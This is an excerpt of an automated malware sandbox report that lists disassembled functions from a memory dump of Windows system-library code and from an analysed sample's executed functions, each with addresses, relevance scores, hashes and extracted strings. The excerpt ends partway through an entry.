                      • Opcode ID: 82f13cf88bce29887ea2196bd94a27650b89ca939c97bbeb4c5b1493139fc770
                      • Instruction ID: f428b440904f63840e068487438a61118f193e6f22775b3dafd8b63b4f706e18
                      • Opcode Fuzzy Hash: 82f13cf88bce29887ea2196bd94a27650b89ca939c97bbeb4c5b1493139fc770
                      • Instruction Fuzzy Hash: 3590026124580403D24075584844607900697D0312F95C021A2064569ECA298E516237
                      Function 01772EA0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8f17a4d20f9f1908375e136cc029fca68c3f1f1588b1b476751d829302815a5
                      • Instruction ID: abd499cf8fea3059bbfa288c52d492a0c79e31b2da894dca13e492144c54cfd6
                      • Opcode Fuzzy Hash: a8f17a4d20f9f1908375e136cc029fca68c3f1f1588b1b476751d829302815a5
                      • Instruction Fuzzy Hash: 9D90027124540402D24071584444746900697D0311F95C021A5064568EC6598FD56767
                      Function 01772E80 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b74eed2e12b9ae23d1944d7d830ec95a847a6aa102ab34ec24e9c64c1602b016
                      • Instruction ID: 354e26ebc23225eb111b90b9d237a2985e34ff8076f3344505dcbd16314de1af
                      • Opcode Fuzzy Hash: b74eed2e12b9ae23d1944d7d830ec95a847a6aa102ab34ec24e9c64c1602b016
                      • Instruction Fuzzy Hash: 1390022164540502D20171584444616900B97D0351FD5C032A1024569ECA258B92A233
                      Function 01773010 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 91ccbaa562b11ea1727dc2db0e3904bd740f824a10ed7ea90acaed375b1ef702
                      • Instruction ID: b613f800cab27dc1e4bb588023f2e6dc194911904b434e8f499d543e9256553c
                      • Opcode Fuzzy Hash: 91ccbaa562b11ea1727dc2db0e3904bd740f824a10ed7ea90acaed375b1ef702
                      • Instruction Fuzzy Hash: 4D90022124584442D24072584844B0FD10697E1312FD5C029A4156568CC9158A555723
                      Function 01773090 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 83a91da17031f3e8e628d387239ba6ed6234d21e62fc20193ee8158d8bd1cdaf
                      • Instruction ID: e8e7e39006f20b483b1194000271a9ce3fff5906dceb401be100a98fbf651ec5
                      • Opcode Fuzzy Hash: 83a91da17031f3e8e628d387239ba6ed6234d21e62fc20193ee8158d8bd1cdaf
                      • Instruction Fuzzy Hash: 3690022128540802D240715884547079007D7D0711F95C021A0024568DC6168B6567B3
                      Function 017739B0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3647eca601aa4ddddca599a1b209ec2a4afafeba23f596413f465bd34e32928b
                      • Instruction ID: d3b3e244d1c452e1156b687b7102affa3fa5663a33848cf1c91668c4e997b159
                      • Opcode Fuzzy Hash: 3647eca601aa4ddddca599a1b209ec2a4afafeba23f596413f465bd34e32928b
                      • Instruction Fuzzy Hash: 6390022128945102D250715C4444616D006B7E0311F95C031A08145A8DC5558A556323
                      Function 01773D70 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e3e6dc7bd5ab14691cf29c4ab53c1e10ce76e40388b9cd55b232ae92106382c5
                      • Instruction ID: 3cd7118e8c4b8f0fdae1ad62ef8c7b8668ddf5527a3c938c930d988426ce9b7c
                      • Opcode Fuzzy Hash: e3e6dc7bd5ab14691cf29c4ab53c1e10ce76e40388b9cd55b232ae92106382c5
                      • Instruction Fuzzy Hash: 3890023524540402D61071585844646904797D0311F95D421A042456CDC6548AA1A223
                      Function 01773D10 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 981ea38d913e2cafc222ab8039ab6fd7cc2a09c087bccaa380606321f2869d60
                      • Instruction ID: 01ccd5f772221dfd8fcb734b6803d4f4dcfefe06ae21f56f9dd93d232d5e1053
                      • Opcode Fuzzy Hash: 981ea38d913e2cafc222ab8039ab6fd7cc2a09c087bccaa380606321f2869d60
                      • Instruction Fuzzy Hash: A990023124640142964072585844A4ED10697E1312BD5D425A0015568CC9148A615323
                      Function 01772C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction ID: 3359e3763cde15d4dfcf781cfa0b1add1cbe46feebc32dc6a0fa385504687a48
                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction Fuzzy Hash:
                      Function 01772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                      • Instruction ID: c36ed54a1c50f272d8ce9102c9b1608a40863b64ae524cfb324e400637d69a8b
                      • Opcode Fuzzy Hash: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                      • Instruction Fuzzy Hash: 2651E8B5A00116BFDF11DB9C889097EFBB8BB48240B548269F5A5E7646D334DE40CBA0
                      Function 017E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                      • Instruction ID: 5698160bf4b54df8080d47a94eb3d93264229ccc79995da84207c64c8e45ff63
                      • Opcode Fuzzy Hash: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                      • Instruction Fuzzy Hash: F451F7B1A00645AECB30DF5CC99497FFBFCEB4C200B1484A9E596D7643EAB4EE408760
                      Function 01767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                      Download Yara Rule
                      Strings
                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
                      • Execute=1, xrefs: 017A4713
                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
                      • ExecuteOptions, xrefs: 017A46A0
                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                      • API String ID: 0-484625025
                      • Opcode ID: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                      • Instruction ID: e0e2a32de2b374f20e02bd3302117b326bee40e747b4f1d5f6bc2b85d6eca8f6
                      • Opcode Fuzzy Hash: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                      • Instruction Fuzzy Hash: B3513B71600219BAEF25AAA8DC99FEDF7BCEF14348F4401E9DA05AB181E7719E418F50
                      Function 01806940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                      • Instruction ID: 3bee79b3e0be4b0c9febe298baf1d389d433fd6b5b65437f558d2b6b3acc53b0
                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                      • Instruction Fuzzy Hash: 420249705083469FD756CF18C894A6BBBE5FFC8704F10892DF9858B2A4E731EA45CB42
                      Function 0177B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-$0$0
                      • API String ID: 1302938615-699404926
                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction ID: 1bb7149d1a0cb93d38ecdca879809e52650bba104c9df50c27eafb636c1206a1
                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction Fuzzy Hash: 6A81F370E452498EEF25CF6CC8907FEFBB1AF85320F18465AE961E7295C7309840CB91
                      Function 017E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$[$]:%u
                      • API String ID: 48624451-2819853543
                      • Opcode ID: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
                      • Instruction ID: 20254af916543ff511e6208330d0042110bf8f94ebc7ab42019548e7358be7f2
                      • Opcode Fuzzy Hash: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
                      • Instruction Fuzzy Hash: 8421517AA00119ABDB11DE7DC848AAEFBEDEF58644F140126E915E3205E730DA058BA1
                      Function 0175F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                      Download Yara Rule
                      Strings
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
                      • RTL: Re-Waiting, xrefs: 017A031E
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                      • API String ID: 0-2474120054
                      • Opcode ID: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                      • Instruction ID: d41e43376ba3f03d8b9d101faf7e22051bc0e2757e27c2e4c0f805d852c8fb15
                      • Opcode Fuzzy Hash: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                      • Instruction Fuzzy Hash: 99E1BC306087419FD765CF28C884B6AFBE0FB88314F540A6DF9A58B2E1D7B4E944CB52
                      Function 0176BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                      Download Yara Rule
                      Strings
                      • RTL: Resource at %p, xrefs: 017A7B8E
                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
                      • RTL: Re-Waiting, xrefs: 017A7BAC
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 0-871070163
                      • Opcode ID: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                      • Instruction ID: 57f9efc374f229f1e96087e10a56573ce7fcd30ea34db358e54a8b17c989daed
                      • Opcode Fuzzy Hash: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                      • Instruction Fuzzy Hash: 8341E3713047029FD725DE29CC40BAAF7E9EF99710F100A2DF956DB690DB32E9058B91
                      Function 0176B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C
                      Strings
                      • RTL: Resource at %p, xrefs: 017A72A3
                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294
                      • RTL: Re-Waiting, xrefs: 017A72C1
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 885266447-605551621
                      • Opcode ID: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                      • Instruction ID: e5c7221d74435754e70b1f76a828d022c359c70bfa21036d32797fb35a05964b
                      • Opcode Fuzzy Hash: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                      • Instruction Fuzzy Hash: 4F41F031704202ABD725DE29CC41BAAFBB9FB95710F100629FD55EB280DB21F84287D1
                      Function 017E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$]:%u
                      • API String ID: 48624451-3050659472
                      • Opcode ID: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                      • Instruction ID: 60fd25e2c63f144399f9c4e662fcd30ee5bd82674714fdd0ac39bacda7b49c3e
                      • Opcode Fuzzy Hash: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                      • Instruction Fuzzy Hash: 22315472A00219AFDB20DE2DCC44BEEF7FCEB58610F54455AE949E3245EB309A458FA0
                      Function 01777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-
                      • API String ID: 1302938615-2137968064
                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction ID: 50e45cf47cb30262fda08364a591631b75d38129fd0e80e2deaa660339a2b138
                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction Fuzzy Hash: 8491E371E002069BEF28CF6DC989ABEFBA5EF44320F54491AE955E72C4E7708981C751
                      Function 01739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: $$@
                      • API String ID: 0-1194432280
                      • Opcode ID: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                      • Instruction ID: bd230fedec3294854c65c95dbba2adf87ef4f038640cb517fe25e002e0fe0675
                      • Opcode Fuzzy Hash: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                      • Instruction Fuzzy Hash: 22811B72D002699BDB31DF54CC45BEEB7B4AB48714F1041DAEA19B7681E7709E84CFA0
                      Function 017BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                      Download Yara Rule
                      APIs
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 017BCFBD
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: CallFilterFunc@8
                      • String ID: @$@4_w@4_w
                      • API String ID: 4062629308-713214301
                      • Opcode ID: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                      • Instruction ID: a73438d799a6a6f38e4de533d7fa01d359e0956f42c025574647c7f3f57b4cad
                      • Opcode Fuzzy Hash: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                      • Instruction Fuzzy Hash: 0441D071A00225DFCB329FA9C884AADFBB8FF59704F10416AEA14DB258D734D941CB61

                      Executed Functions

                      Function 031787FD Relevance: 70.6, Strings: 56, Instructions: 628COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "$"T8$ T$!$!$"D$#$$!$&B$.$/$/$0$1$2$4!$5$6y$9$=$=h$?S$?g$Ct$D$E$G$H|$K$L$T8$U$V$Yw6$\$^$^$_$a$a{$b$c$h$hc$m$m$m$o$oJ%Gm=h$p$s$w6\?hc$x)${$|$V
                      • API String ID: 0-1125895580
                      • Opcode ID: 4e8ec60641d45dcc04192d9167ee7a77eede532388708df07684020ee12c8cd0
                      • Instruction ID: e215b981b3a93f75ae815e421e8cb1bea634020cc570bd7343257b71faab2b7c
                      • Opcode Fuzzy Hash: 4e8ec60641d45dcc04192d9167ee7a77eede532388708df07684020ee12c8cd0
                      • Instruction Fuzzy Hash: AF827AB0D05229DBEB64CF45C9987DDBBB2BB48308F6481D9C5096B280CBB95EC9DF40
                      Function 031863F1 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 6$O$S$\$s
                      • API String ID: 0-3854637164
                      • Opcode ID: 4c4e995badd7e0f077f970ddb03883b6808941c6dc52bed2543d4f0fc7d9eaa2
                      • Instruction ID: d36f37edea2114bb5e53a46a4b2a2ce9a8351c8a2bd86c5922e745bef2c71a4e
                      • Opcode Fuzzy Hash: 4c4e995badd7e0f077f970ddb03883b6808941c6dc52bed2543d4f0fc7d9eaa2
                      • Instruction Fuzzy Hash: 5541A0B2D01219BBDB10EF94EC44FEBB7B8AB4C310F044596EA089A140E775AA54CFE1
                      Function 03192BDD Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Kj
                      • API String ID: 0-4281535607
                      • Opcode ID: 0be8a4f901ffff3b9429e14814aa898ac5418f71163d2ef9e52a6cb60662c1a8
                      • Instruction ID: 066be41aeff2fc978b169033011664f3410b1b7fe654c25827123a0345b22a86
                      • Opcode Fuzzy Hash: 0be8a4f901ffff3b9429e14814aa898ac5418f71163d2ef9e52a6cb60662c1a8
                      • Instruction Fuzzy Hash: BB11FEB6D0121CAF9B00DFE9D8409EFB7F9EF88200F14456BE919E7204E7705A158BA1
                      Function 03193E0D Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: C$
                      • API String ID: 0-2794384104
                      • Opcode ID: e71ccd73a85a9b4e62ffb81ece3b6ab32073cdc606dcfd5133d763ac80ca9af5
                      • Instruction ID: 9d64d32ff82976c8b6f09628d23023c026d0c8cf22cf7e6d79c8d73912d8c1e4
                      • Opcode Fuzzy Hash: e71ccd73a85a9b4e62ffb81ece3b6ab32073cdc606dcfd5133d763ac80ca9af5
                      • Instruction Fuzzy Hash: 751100B6D0121CAF9B00DFE9DC409EEBBF9EF48200F14466BE919E7200E7705A158BA1
                      Function 03172228 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,
                      • API String ID: 0-3772416878
                      • Opcode ID: 6e1b4dfcab38ef2f93208ee42140161732efa6caaca50b8bcb9ac64ef10ebc1e
                      • Instruction ID: 6de2ec7dab7fa66593d14d06d5f2fd56846ce749cb9a2d25f2f01e12b446aa99
                      • Opcode Fuzzy Hash: 6e1b4dfcab38ef2f93208ee42140161732efa6caaca50b8bcb9ac64ef10ebc1e
                      • Instruction Fuzzy Hash: F501F23782464ACBDB25EF28CC92645F7B8FA49320B690796C9658B081E73091A3C680
                      Function 0317206E Relevance: .1, Instructions: 98COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4967fa39c1ed7d8bdaba85c1335ad5044ba91f0f7925ee448a0068e6e5916c26
                      • Instruction ID: b6e5ea1f888886983485d69cd4a1196e2f82390095972825669917bbee6aa6fb
                      • Opcode Fuzzy Hash: 4967fa39c1ed7d8bdaba85c1335ad5044ba91f0f7925ee448a0068e6e5916c26
                      • Instruction Fuzzy Hash: B63164B2A11218BBEB04CF95DC81EFFBBBCEB49710F10065AFA14A6140E3B19641C7A4
                      Function 03195E5D Relevance: .1, Instructions: 82COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12c5551fa9eeadeae640991e6ed1fbd750431c6a7cf4dd7c00dfb44ec59a9402
                      • Instruction ID: 90759d429a3acf238745841b5f75420706354f2025727299eea67f4ab2169a5b
                      • Opcode Fuzzy Hash: 12c5551fa9eeadeae640991e6ed1fbd750431c6a7cf4dd7c00dfb44ec59a9402
                      • Instruction Fuzzy Hash: 4821E6B5A10208AFEB14DF98DC81EEB77E9EF8D300F10425AF918A7240D775A911CBA5
                      Function 0318622D Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 986924cc058b77783d394b45d5261b59be329e84012c883d46ce305449354130
                      • Instruction ID: 9b5a16a524c485496196b2b36d588434685ba7bb00be736962917689e006c9f8
                      • Opcode Fuzzy Hash: 986924cc058b77783d394b45d5261b59be329e84012c883d46ce305449354130
                      • Instruction Fuzzy Hash: 121186763803057BF720EE559C42FAB776D9B89B20F244155FB04AE1C0D7A5B81146B8
                      Function 0319677D Relevance: .1, Instructions: 74COMMON
                      Download Yara Rule
                      Memory Dump Source
